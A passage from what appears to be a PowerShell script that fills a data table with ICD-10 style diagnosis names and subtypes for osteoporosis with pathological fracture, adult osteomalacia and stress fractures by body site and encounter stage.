osteoporosis with current pathological fracture, unspecified ankle and foot","Age-related osteoporosis with current pathological fracture, unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, vertebra(e)","Age-related osteoporosis with current pathological fracture, vertebra(e), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, vertebra(e)","Age-related osteoporosis with current pathological fracture, vertebra(e), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, vertebra(e)","Age-related osteoporosis with current pathological fracture, vertebra(e), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, vertebra(e)","Age-related osteoporosis with current pathological fracture, vertebra(e), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, vertebra(e)","Age-related osteoporosis with current pathological fracture, vertebra(e), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, vertebra(e)","Age-related osteoporosis with current pathological fracture, vertebra(e), sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified site","Other osteoporosis with current pathological fracture, unspecified site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified site","Other osteoporosis with current pathological fracture, unspecified site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified site","Other osteoporosis with current pathological fracture, unspecified site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified site","Other osteoporosis with current pathological fracture, unspecified site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified site","Other osteoporosis with current pathological fracture, unspecified site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified site","Other osteoporosis with current pathological fracture, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right shoulder","Other osteoporosis with current pathological fracture, right shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right shoulder","Other osteoporosis with current pathological fracture, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right shoulder","Other osteoporosis with current pathological fracture, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right shoulder","Other osteoporosis with current pathological fracture, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right shoulder","Other osteoporosis with current pathological fracture, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right shoulder","Other osteoporosis with current pathological fracture, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left shoulder","Other osteoporosis with current pathological fracture, left shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left shoulder","Other osteoporosis with current pathological fracture, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left shoulder","Other osteoporosis with current pathological fracture, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left shoulder","Other osteoporosis with current pathological fracture, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left shoulder","Other osteoporosis with current pathological fracture, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left shoulder","Other osteoporosis with current pathological fracture, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified shoulder","Other osteoporosis with current pathological fracture, unspecified shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified shoulder","Other osteoporosis with current pathological fracture, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified shoulder","Other osteoporosis with current pathological fracture, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified shoulder","Other osteoporosis with current pathological fracture, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified shoulder","Other osteoporosis with current pathological fracture, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified shoulder","Other osteoporosis with current pathological fracture, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right humerus","Other osteoporosis with current pathological fracture, right humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right humerus","Other osteoporosis with current pathological fracture, right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right humerus","Other osteoporosis with current pathological fracture, right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right humerus","Other osteoporosis with current pathological fracture, right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right humerus","Other osteoporosis with current pathological fracture, right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right humerus","Other osteoporosis with current pathological fracture, right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left humerus","Other osteoporosis with current pathological fracture, left humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left humerus","Other osteoporosis with current pathological fracture, left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left humerus","Other osteoporosis with current pathological fracture, left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left humerus","Other osteoporosis with current pathological fracture, left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left humerus","Other osteoporosis with current pathological fracture, left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left humerus","Other osteoporosis with current pathological fracture, left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified humerus","Other osteoporosis with current pathological fracture, unspecified humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified humerus","Other osteoporosis with current pathological fracture, unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified humerus","Other osteoporosis with current pathological fracture, unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified humerus","Other osteoporosis with current pathological fracture, unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified humerus","Other osteoporosis with current pathological fracture, unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified humerus","Other osteoporosis with current pathological fracture, unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right forearm","Other osteoporosis with current pathological fracture, right forearm, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right forearm","Other osteoporosis with current pathological fracture, right forearm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right forearm","Other osteoporosis with current pathological fracture, right forearm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right forearm","Other osteoporosis with current pathological fracture, right forearm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right forearm","Other osteoporosis with current pathological fracture, right forearm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right forearm","Other osteoporosis with current pathological fracture, right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left forearm","Other osteoporosis with current pathological fracture, left forearm, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left forearm","Other osteoporosis with current pathological fracture, left forearm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left forearm","Other osteoporosis with current pathological fracture, left forearm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left forearm","Other osteoporosis with current pathological fracture, left forearm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left forearm","Other osteoporosis with current pathological fracture, left forearm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left forearm","Other osteoporosis with current pathological fracture, left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified forearm","Other osteoporosis with current pathological fracture, unspecified forearm, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified forearm","Other osteoporosis with current pathological fracture, unspecified forearm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified forearm","Other osteoporosis with current pathological fracture, unspecified forearm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified forearm","Other osteoporosis with current pathological fracture, unspecified forearm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified forearm","Other osteoporosis with current pathological fracture, unspecified forearm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified forearm","Other osteoporosis with current pathological fracture, unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right hand","Other osteoporosis with current pathological fracture, right hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right hand","Other osteoporosis with current pathological fracture, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right hand","Other osteoporosis with current pathological fracture, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right hand","Other osteoporosis with current pathological fracture, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right hand","Other osteoporosis with current pathological fracture, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right hand","Other osteoporosis with current pathological fracture, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left hand","Other osteoporosis with current pathological fracture, left hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left hand","Other osteoporosis with current pathological fracture, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left hand","Other osteoporosis with current pathological fracture, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left hand","Other osteoporosis with current pathological fracture, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left hand","Other osteoporosis with current pathological fracture, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left hand","Other osteoporosis with current pathological fracture, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified hand","Other osteoporosis with current pathological fracture, unspecified hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified hand","Other osteoporosis with current pathological fracture, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified hand","Other osteoporosis with current pathological fracture, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified hand","Other osteoporosis with current pathological fracture, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified hand","Other osteoporosis with current pathological fracture, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified hand","Other osteoporosis with current pathological fracture, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right femur","Other osteoporosis with current pathological fracture, right femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right femur","Other osteoporosis with current pathological fracture, right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right femur","Other osteoporosis with current pathological fracture, right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right femur","Other osteoporosis with current pathological fracture, right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right femur","Other osteoporosis with current pathological fracture, right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right femur","Other osteoporosis with current pathological fracture, right femur, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left femur","Other osteoporosis with current pathological fracture, left femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left femur","Other osteoporosis with current pathological fracture, left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left femur","Other osteoporosis with current pathological fracture, left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left femur","Other osteoporosis with current pathological fracture, left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left femur","Other osteoporosis with current pathological fracture, left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left femur","Other osteoporosis with current pathological fracture, left femur, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified femur","Other osteoporosis with current pathological fracture, unspecified femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified femur","Other osteoporosis with current pathological fracture, unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified femur","Other osteoporosis with current pathological fracture, unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified femur","Other osteoporosis with current pathological fracture, unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified femur","Other osteoporosis with current pathological fracture, unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified femur","Other osteoporosis with current pathological fracture, unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right lower leg","Other osteoporosis with current pathological fracture, right lower leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right lower leg","Other osteoporosis with current pathological fracture, right lower leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right lower leg","Other osteoporosis with current pathological fracture, right lower leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right lower leg","Other osteoporosis with current pathological fracture, right lower leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right lower leg","Other osteoporosis with current pathological fracture, right lower leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right lower leg","Other osteoporosis with current pathological fracture, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left lower leg","Other osteoporosis with current pathological fracture, left lower leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left lower leg","Other osteoporosis with current pathological fracture, left lower leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left lower leg","Other osteoporosis with current pathological fracture, left lower leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left lower leg","Other osteoporosis with current pathological fracture, left lower leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left lower leg","Other osteoporosis with current pathological fracture, left lower leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left lower leg","Other osteoporosis with current pathological fracture, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified lower leg","Other osteoporosis with current pathological fracture, unspecified lower leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified lower leg","Other osteoporosis with current pathological fracture, unspecified lower leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified lower leg","Other osteoporosis with current pathological fracture, unspecified lower leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified lower leg","Other osteoporosis with current pathological fracture, unspecified lower leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified lower leg","Other osteoporosis with current pathological fracture, unspecified lower leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified lower leg","Other osteoporosis with current pathological fracture, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right ankle and foot","Other osteoporosis with current pathological fracture, right ankle and foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right ankle and foot","Other osteoporosis with current pathological fracture, right ankle and foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right ankle and foot","Other osteoporosis with current pathological fracture, right ankle and foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right ankle and foot","Other osteoporosis with current pathological fracture, right ankle and foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right ankle and foot","Other osteoporosis with current pathological fracture, right ankle and foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, right ankle and foot","Other osteoporosis with current pathological fracture, right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left ankle and foot","Other osteoporosis with current pathological fracture, left ankle and foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left ankle and foot","Other osteoporosis with current pathological fracture, left ankle and foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left ankle and foot","Other osteoporosis with current pathological fracture, left ankle and foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left ankle and foot","Other osteoporosis with current pathological fracture, left ankle and foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left ankle and foot","Other osteoporosis with current pathological fracture, left ankle and foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, left ankle and foot","Other osteoporosis with current pathological fracture, left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified ankle and foot","Other osteoporosis with current pathological fracture, unspecified ankle and foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified ankle and foot","Other osteoporosis with current pathological fracture, unspecified ankle and foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified ankle and foot","Other osteoporosis with current pathological fracture, unspecified ankle and foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified ankle and foot","Other osteoporosis with current pathological fracture, unspecified ankle and foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified ankle and foot","Other osteoporosis with current pathological fracture, unspecified ankle and foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, unspecified ankle and foot","Other osteoporosis with current pathological fracture, unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, vertebra(e)","Other osteoporosis with current pathological fracture, vertebra(e), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, vertebra(e)","Other osteoporosis with current pathological fracture, vertebra(e), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, vertebra(e)","Other osteoporosis with current pathological fracture, vertebra(e), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, vertebra(e)","Other osteoporosis with current pathological fracture, vertebra(e), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, vertebra(e)","Other osteoporosis with current pathological fracture, vertebra(e), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other osteoporosis with current pathological fracture, vertebra(e)","Other osteoporosis with current pathological fracture, vertebra(e), sequela") + $null = $DiagnosisList.Rows.Add("Osteoporosis without current pathological fracture","Age-related osteoporosis without current pathological fracture") + $null = $DiagnosisList.Rows.Add("Osteoporosis without current pathological fracture","Localized osteoporosis [Lequesne]") + $null = $DiagnosisList.Rows.Add("Osteoporosis without current pathological fracture","Other osteoporosis without current pathological fracture") + $null = $DiagnosisList.Rows.Add("Adult osteomalacia","Puerperal osteomalacia") + $null = $DiagnosisList.Rows.Add("Adult osteomalacia","Senile osteomalacia") + $null = $DiagnosisList.Rows.Add("Adult osteomalacia","Adult osteomalacia due to malabsorption") + $null = $DiagnosisList.Rows.Add("Adult osteomalacia","Adult osteomalacia due to malnutrition") + $null = $DiagnosisList.Rows.Add("Adult osteomalacia","Aluminum bone disease") + $null = $DiagnosisList.Rows.Add("Adult osteomalacia","Other drug-induced osteomalacia in adults") + $null = $DiagnosisList.Rows.Add("Adult osteomalacia","Other adult osteomalacia") + $null = $DiagnosisList.Rows.Add("Adult osteomalacia","Adult osteomalacia, unspecified") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified site","Stress fracture, unspecified site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified site","Stress fracture, unspecified site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified site","Stress fracture, unspecified site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified site","Stress fracture, unspecified site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified site","Stress fracture, unspecified site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified site","Stress fracture, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right shoulder","Stress fracture, right shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right shoulder","Stress fracture, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right shoulder","Stress fracture, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right shoulder","Stress fracture, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right shoulder","Stress fracture, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right shoulder","Stress fracture, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left shoulder","Stress fracture, left shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left shoulder","Stress fracture, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left shoulder","Stress fracture, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left shoulder","Stress fracture, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left shoulder","Stress fracture, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left shoulder","Stress fracture, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified shoulder","Stress fracture, unspecified shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified shoulder","Stress fracture, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified shoulder","Stress fracture, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified shoulder","Stress fracture, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified shoulder","Stress fracture, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified shoulder","Stress fracture, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right humerus","Stress fracture, right humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right humerus","Stress fracture, right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right humerus","Stress fracture, right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right humerus","Stress fracture, right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right humerus","Stress fracture, right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right humerus","Stress fracture, right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left humerus","Stress fracture, left humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left humerus","Stress fracture, left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left humerus","Stress fracture, left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left humerus","Stress fracture, left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left humerus","Stress fracture, left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left humerus","Stress fracture, left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified humerus","Stress fracture, unspecified humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified humerus","Stress fracture, unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified humerus","Stress fracture, unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified humerus","Stress fracture, unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified humerus","Stress fracture, unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified humerus","Stress fracture, unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ulna","Stress fracture, right ulna, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ulna","Stress fracture, right ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ulna","Stress fracture, right ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ulna","Stress fracture, right ulna, subsequent encounter for fracture with nonunion") + $null = 